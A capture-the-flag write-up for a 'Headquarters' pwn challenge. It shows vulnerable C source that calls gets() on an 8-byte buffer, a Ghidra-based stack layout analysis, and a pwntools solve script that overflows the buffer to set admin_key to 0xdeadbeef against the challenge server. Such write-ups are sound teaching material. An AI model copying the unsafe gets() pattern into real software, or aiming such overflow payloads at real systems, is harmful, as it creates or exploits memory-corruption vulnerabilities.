Headquarters

in the zip file, we are given a fake flag file, a binary and a source code file

└─# file *
flag:           ASCII text, with no line terminators

headquarters:   ELF 64-bit LSB pie executable, x86-64, version 1 (SYSV), dynamically     
                linked, interpreter /lib64/ld-linux-x86-64.so.2, 
                BuildID[sha1]=0344efd94a056bce37c0a6c917edd954e3d60142, for GNU/Linux 
                3.2.0, not stripped

headquarters.c: C source, ASCII text

[...]
└─# cat flag
sctf{FAKE_FLAG}

lets take a look at the source code

/*
Compile options:
    gcc headquarters.c -o headquarters -fno-stack-protector
*/

#include <stdio.h>
#include <stdlib.h>

void print_flag()
{
    system("cat flag");
}

int main()
{
    int admin_key = 0;
    char name[8];

    printf("Welcome to Sieberrsec's headquarters!\n");
    printf("Enter your name: ");
    gets(name);

    if (admin_key==0xdeadbeef)
    {
        printf("Welcome back, admin.\n");
        print_flag();
    }
    else {
        printf("Hi %s! Welcome to Sieberrsec headquarters!\n", name);
    }

    return 0;
}

Seems like we have to overwrite the admin_key variable with 0xdeadbeef

lets do this with a buffer overflow attack

[...]
gets(name); // buffer overflow vuln
[...]

Ghidra Disassembly

Opening the binary in ghidra, we can take a look at the stack layout of the main function

Disassembly view in ghidra

Stack layout (illustrated)

Illustrated Stack Layout of the main function

Our goal is to overwrite the admin_key variable from the name variable

Our input variable is located at RBP -0x14 and the variable we need to overwrite is located at RBP -0xc

The buffer size is 8

Writing solve script

from pwn import *
context.binary = binary = ELF("./headquarters")

p = process()
p = remote("challs.sieberr.live", 1003)

payload = b"a" * 8 + p64(0xdeadbeef)

p.sendline(payload)

p.interactive()

Running solve script

└─# python3 solve.py
[*] '/mnt/f/sieberrctf/headquarters'
    Arch:     amd64-64-little
    RELRO:    Full RELRO
    Stack:    No canary found
    NX:       NX enabled
    PIE:      PIE enabled
[+] Starting local process '/mnt/f/sieberrctf/headquarters': pid 6629
[+] Opening connection to challs.sieberr.live on port 1003: Done
[*] Switching to interactive mode
Welcome to Sieberrsec's headquarters!
Enter your name: Welcome back, admin.
sctf{1m_4dm1n_n0w}[*] Got EOF while reading in interactive

flag:

sctf{1m_4dm1n_n0w}